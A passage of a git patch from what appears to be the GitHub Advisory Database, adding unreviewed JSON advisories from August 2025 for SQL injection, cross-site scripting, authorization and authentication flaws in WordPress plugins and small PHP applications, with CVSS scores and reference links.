"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8466" + }, + { + "type": "WEB", + "url": "https://github.com/wllovemy/cve/issues/11" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318516" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318516" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.625785" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T09:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-v6g9-v26j-6w22/GHSA-v6g9-v26j-6w22.json b/advisories/unreviewed/2025/08/GHSA-v6g9-v26j-6w22/GHSA-v6g9-v26j-6w22.json new file mode 100644 index 0000000000000..1e0fd7651f416 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-v6g9-v26j-6w22/GHSA-v6g9-v26j-6w22.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6g9-v26j-6w22", + "modified": "2025-08-02T09:30:19Z", + "published": "2025-08-02T09:30:19Z", + "aliases": [ + "CVE-2025-6626" + ], + "details": "The ShortPixel Adaptive Images – WebP, AVIF, CDN, Image Optimization plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the API URL Setting in all versions up to, and including, 3.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6626" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/shortpixel-adaptive-images/tags/3.10.4/includes/front/vanilla-js-loader.class.php#L48" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3337681%40shortpixel-adaptive-images&new=3337681%40shortpixel-adaptive-images&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/56ab6429-4b1b-461a-9fcd-b4be84985118?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T08:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-vrcj-8r35-5gqx/GHSA-vrcj-8r35-5gqx.json b/advisories/unreviewed/2025/08/GHSA-vrcj-8r35-5gqx/GHSA-vrcj-8r35-5gqx.json new file mode 100644 index 0000000000000..6de10e5356bec --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-vrcj-8r35-5gqx/GHSA-vrcj-8r35-5gqx.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrcj-8r35-5gqx", + "modified": "2025-08-02T09:30:19Z", + "published": "2025-08-02T09:30:19Z", + "aliases": [ + "CVE-2025-8152" + ], + "details": "The WP CTA – Call To Action Plugin, Sticky CTA, Sticky Buttons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_cta_status' and 'change_sticky_sidebar_name' functions in all versions up to, and including, 1.7.0. This makes it possible for unauthenticated attackers to update the status of a sticky and update the name displayed in the back-end WP CTA Dashboard.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8152" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/easy-sticky-sidebar/trunk/inc/ClassActions.php#L29" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/easy-sticky-sidebar/trunk/inc/ClassActions.php#L52" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3336867%40easy-sticky-sidebar&new=3336867%40easy-sticky-sidebar&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/981ed50b-8f03-4320-99f0-3f53f7b2fc44?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T08:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-wqwr-pr9c-fc8f/GHSA-wqwr-pr9c-fc8f.json b/advisories/unreviewed/2025/08/GHSA-wqwr-pr9c-fc8f/GHSA-wqwr-pr9c-fc8f.json new file mode 100644 index 0000000000000..3791c2399d096 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-wqwr-pr9c-fc8f/GHSA-wqwr-pr9c-fc8f.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wqwr-pr9c-fc8f", + "modified": "2025-08-02T09:30:20Z", + "published": "2025-08-02T09:30:20Z", + "aliases": [ + "CVE-2025-8400" + ], + "details": "The Image Gallery plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8400" + }, + { + "type": "WEB", + "url": "https://plugins.svn.wordpress.org/bee-quick-gallery/trunk/includes/bee-quick-gallery-functions.php" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/bee-quick-gallery/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ef52026b-1bfc-481c-8eb7-511d1910a35e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T09:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-wxh5-h8r6-4qxv/GHSA-wxh5-h8r6-4qxv.json b/advisories/unreviewed/2025/08/GHSA-wxh5-h8r6-4qxv/GHSA-wxh5-h8r6-4qxv.json new file mode 100644 index 0000000000000..ad68800a254c7 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-wxh5-h8r6-4qxv/GHSA-wxh5-h8r6-4qxv.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxh5-h8r6-4qxv", + "modified": "2025-08-02T09:30:20Z", + "published": "2025-08-02T09:30:20Z", + "aliases": [ + "CVE-2025-8317" + ], + "details": "The Custom Word Cloud plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘angle’ parameter in all versions up to, and including, 0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8317" + }, + { + "type": "WEB", + "url": "https://plugins.svn.wordpress.org/custom-word-cloud/trunk/custom-word-cloud.php" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/custom-word-cloud/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f153a0ce-c967-43ed-97be-901ea7dcd12b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T08:15:27Z" + } +} \ No newline at end of file From 01f5ea98b5cca500846c6d16a26b6abb087bf72b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 2 Aug 2025 12:32:12 +0000 Subject: [PATCH 312/323] Publish Advisories GHSA-8cv8-4354-xjv8 GHSA-fv5p-jgq7-gfm9 GHSA-j2v9-cq8f-8ch7 GHSA-r65w-xc5g-2hpm GHSA-wr6h-564j-w633 --- .../GHSA-8cv8-4354-xjv8.json | 56 +++++++++++++++++++ .../GHSA-fv5p-jgq7-gfm9.json | 44 +++++++++++++++ .../GHSA-j2v9-cq8f-8ch7.json | 40 +++++++++++++ .../GHSA-r65w-xc5g-2hpm.json | 56 +++++++++++++++++++ .../GHSA-wr6h-564j-w633.json | 44 +++++++++++++++ 5 files changed, 240 insertions(+) create mode 100644 advisories/unreviewed/2025/08/GHSA-8cv8-4354-xjv8/GHSA-8cv8-4354-xjv8.json create mode 100644 advisories/unreviewed/2025/08/GHSA-fv5p-jgq7-gfm9/GHSA-fv5p-jgq7-gfm9.json create mode 100644 advisories/unreviewed/2025/08/GHSA-j2v9-cq8f-8ch7/GHSA-j2v9-cq8f-8ch7.json create mode 100644 advisories/unreviewed/2025/08/GHSA-r65w-xc5g-2hpm/GHSA-r65w-xc5g-2hpm.json create mode 100644 advisories/unreviewed/2025/08/GHSA-wr6h-564j-w633/GHSA-wr6h-564j-w633.json diff --git a/advisories/unreviewed/2025/08/GHSA-8cv8-4354-xjv8/GHSA-8cv8-4354-xjv8.json b/advisories/unreviewed/2025/08/GHSA-8cv8-4354-xjv8/GHSA-8cv8-4354-xjv8.json new file mode 100644 index 0000000000000..9b2f461a268d4 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-8cv8-4354-xjv8/GHSA-8cv8-4354-xjv8.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8cv8-4354-xjv8", + "modified": "2025-08-02T12:30:32Z", + "published": "2025-08-02T12:30:32Z", + "aliases": [ + "CVE-2025-8467" + ], + "details": "A vulnerability was found in code-projects Wazifa System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /controllers/regcontrol.php. The manipulation of the argument Username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8467" + }, + { + "type": "WEB", + "url": "https://github.com/wllovemy/cve/issues/12" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318517" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318517" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.625786" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T11:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-fv5p-jgq7-gfm9/GHSA-fv5p-jgq7-gfm9.json b/advisories/unreviewed/2025/08/GHSA-fv5p-jgq7-gfm9/GHSA-fv5p-jgq7-gfm9.json new file mode 100644 index 0000000000000..be560b42062b5 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-fv5p-jgq7-gfm9/GHSA-fv5p-jgq7-gfm9.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fv5p-jgq7-gfm9", + "modified": "2025-08-02T12:30:31Z", + "published": "2025-08-02T12:30:31Z", + "aliases": [ + "CVE-2025-6722" + ], + "details": "The BitFire Security – Firewall, WAF, Bot/Spam Blocker, Login Security plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.5 via the bitfire_* directory that automatically gets created and stores potentially sensitive files without any access restrictions. This makes it possible for unauthenticated attackers to extract sensitive data from various files like config.ini, debug.log, and more.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6722" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3334399%40bitfire&new=3334399%40bitfire&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3335461%40bitfire&new=3335461%40bitfire&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/72320980-733d-4fe6-9a13-39c476b77298?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T10:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-j2v9-cq8f-8ch7/GHSA-j2v9-cq8f-8ch7.json b/advisories/unreviewed/2025/08/GHSA-j2v9-cq8f-8ch7/GHSA-j2v9-cq8f-8ch7.json new file mode 100644 index 0000000000000..f40667b3cb21f --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-j2v9-cq8f-8ch7/GHSA-j2v9-cq8f-8ch7.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j2v9-cq8f-8ch7", + "modified": "2025-08-02T12:30:32Z", + "published": "2025-08-02T12:30:31Z", + "aliases": [ + "CVE-2025-7710" + ], + "details": "The Brave Conversion Engine (PRO) plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 0.7.7. This is due to the plugin not properly restricting a claimed identity while authenticating with Facebook. This makes it possible for unauthenticated attackers to log in as other users, including administrators.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7710" + }, + { + "type": "WEB", + "url": "https://getbrave.io/brave-pro-changelog" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/604249c6-b23a-40e9-984d-2014f5c97249?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-288" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T12:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-r65w-xc5g-2hpm/GHSA-r65w-xc5g-2hpm.json b/advisories/unreviewed/2025/08/GHSA-r65w-xc5g-2hpm/GHSA-r65w-xc5g-2hpm.json new file mode 100644 index 0000000000000..4e1af6b17bcf7 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-r65w-xc5g-2hpm/GHSA-r65w-xc5g-2hpm.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r65w-xc5g-2hpm", + "modified": "2025-08-02T12:30:31Z", + "published": "2025-08-02T12:30:31Z", + "aliases": [ + "CVE-2025-7500" + ], + "details": "The Ocean Social Sharing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via social icon titles in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7500" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ocean-social-sharing/tags/2.2.1/template/social-share.php#L100" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ocean-social-sharing/tags/2.2.1/template/social-share.php#L176" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ocean-social-sharing/tags/2.2.1/template/social-share.php#L262" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ocean-social-sharing/tags/2.2.1/template/social-share.php#L84" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3331993%40ocean-social-sharing&new=3331993%40ocean-social-sharing&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7683e708-b7cb-444e-9069-f33e4ef3ac76?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T12:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-wr6h-564j-w633/GHSA-wr6h-564j-w633.json b/advisories/unreviewed/2025/08/GHSA-wr6h-564j-w633/GHSA-wr6h-564j-w633.json new file mode 100644 index 0000000000000..ac1887add03cd --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-wr6h-564j-w633/GHSA-wr6h-564j-w633.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wr6h-564j-w633", + "modified": "2025-08-02T12:30:31Z", + "published": "2025-08-02T12:30:31Z", + "aliases": [ + "CVE-2025-8488" + ], + "details": "The Ultimate Addons for Elementor (Formerly Elementor Header & Footer Builder) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_hfe_compatibility_option_callback ()function in all versions up to, and including, 2.4.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the compatibility option setting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8488" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/header-footer-elementor/tags/2.4.6/admin/class-hfe-addons-actions.php#L494" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/header-footer-elementor/tags/2.4.7/admin/class-hfe-addons-actions.php#L525" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a4b847b5-9deb-41c4-b976-725249e0098e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T10:15:27Z" + } +} \ No newline at end of file From 4eba663848a4fa46dc6eb367fc42f529599796e1 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 2 Aug 2025 15:32:12 +0000 Subject: [PATCH 313/323] Publish GHSA-237j-pjh8-mjr2 --- .../GHSA-237j-pjh8-mjr2.json | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 advisories/unreviewed/2025/08/GHSA-237j-pjh8-mjr2/GHSA-237j-pjh8-mjr2.json diff --git a/advisories/unreviewed/2025/08/GHSA-237j-pjh8-mjr2/GHSA-237j-pjh8-mjr2.json b/advisories/unreviewed/2025/08/GHSA-237j-pjh8-mjr2/GHSA-237j-pjh8-mjr2.json new file mode 100644 index 0000000000000..f67ffe7aaf9b9 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-237j-pjh8-mjr2/GHSA-237j-pjh8-mjr2.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-237j-pjh8-mjr2", + "modified": "2025-08-02T15:30:33Z", + "published": "2025-08-02T15:30:33Z", + "aliases": [ + "CVE-2025-8468" + ], + "details": "A vulnerability was found in code-projects Wazifa System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /controllers/reset.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8468" + }, + { + "type": "WEB", + "url": "https://github.com/wllovemy/cve/issues/13" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318518" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318518" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.625787" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T15:15:26Z" + } +} \ No newline at end of file From 49e2062c0d1e5e5eac8ca6cd38b67d834cf51a99 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 2 Aug 2025 18:32:47 +0000 Subject: [PATCH 314/323] Publish Advisories GHSA-m8rh-p96p-339m GHSA-q9q5-8h52-gjgq --- .../GHSA-m8rh-p96p-339m.json | 56 +++++++++++++++++++ .../GHSA-q9q5-8h52-gjgq.json | 56 +++++++++++++++++++ 2 files changed, 112 insertions(+) create mode 100644 advisories/unreviewed/2025/08/GHSA-m8rh-p96p-339m/GHSA-m8rh-p96p-339m.json create mode 100644 advisories/unreviewed/2025/08/GHSA-q9q5-8h52-gjgq/GHSA-q9q5-8h52-gjgq.json diff --git a/advisories/unreviewed/2025/08/GHSA-m8rh-p96p-339m/GHSA-m8rh-p96p-339m.json b/advisories/unreviewed/2025/08/GHSA-m8rh-p96p-339m/GHSA-m8rh-p96p-339m.json new file mode 100644 index 0000000000000..68e6eb4f8e21a --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-m8rh-p96p-339m/GHSA-m8rh-p96p-339m.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m8rh-p96p-339m", + "modified": "2025-08-02T18:30:33Z", + "published": "2025-08-02T18:30:33Z", + "aliases": [ + "CVE-2025-8469" + ], + "details": "A vulnerability classified as critical has been found in SourceCodester Online Hotel Reservation System 1.0. This affects an unknown part of the file /admin/deletegallery.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8469" + }, + { + "type": "WEB", + "url": "https://github.com/K1nakoo/tmp01/blob/main/tmp01.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318519" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318519" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626017" + }, + { + "type": "WEB", + "url": "https://www.sourcecodester.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T17:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-q9q5-8h52-gjgq/GHSA-q9q5-8h52-gjgq.json b/advisories/unreviewed/2025/08/GHSA-q9q5-8h52-gjgq/GHSA-q9q5-8h52-gjgq.json new file mode 100644 index 0000000000000..761334f4260c4 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-q9q5-8h52-gjgq/GHSA-q9q5-8h52-gjgq.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q9q5-8h52-gjgq", + "modified": "2025-08-02T18:30:33Z", + "published": "2025-08-02T18:30:33Z", + "aliases": [ + "CVE-2025-8470" + ], + "details": "A vulnerability classified as critical was found in SourceCodester Online Hotel Reservation System 1.0. This vulnerability affects unknown code of the file /admin/deleteroom.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8470" + }, + { + "type": "WEB", + "url": "https://github.com/K1nakoo/tmp02/blob/main/tmp02.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318520" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318520" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626018" + }, + { + "type": "WEB", + "url": "https://www.sourcecodester.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T18:15:26Z" + } +} \ No newline at end of file From d4396306eee6157f5861ec27c13e6b3e127a1479 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 2 Aug 2025 21:32:38 +0000 Subject: [PATCH 315/323] Publish GHSA-h62v-7hxx-hqwr --- .../GHSA-h62v-7hxx-hqwr.json | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 advisories/unreviewed/2025/08/GHSA-h62v-7hxx-hqwr/GHSA-h62v-7hxx-hqwr.json diff --git a/advisories/unreviewed/2025/08/GHSA-h62v-7hxx-hqwr/GHSA-h62v-7hxx-hqwr.json b/advisories/unreviewed/2025/08/GHSA-h62v-7hxx-hqwr/GHSA-h62v-7hxx-hqwr.json new file mode 100644 index 0000000000000..a41cf128b6472 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-h62v-7hxx-hqwr/GHSA-h62v-7hxx-hqwr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h62v-7hxx-hqwr", + "modified": "2025-08-02T21:30:32Z", + "published": "2025-08-02T21:30:32Z", + "aliases": [ + "CVE-2025-8471" + ], + "details": "A vulnerability, which was classified as critical, has been found in projectworlds Online Admission System 1.0. This issue affects some unknown processing of the file /adminlogin.php. The manipulation of the argument a_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": 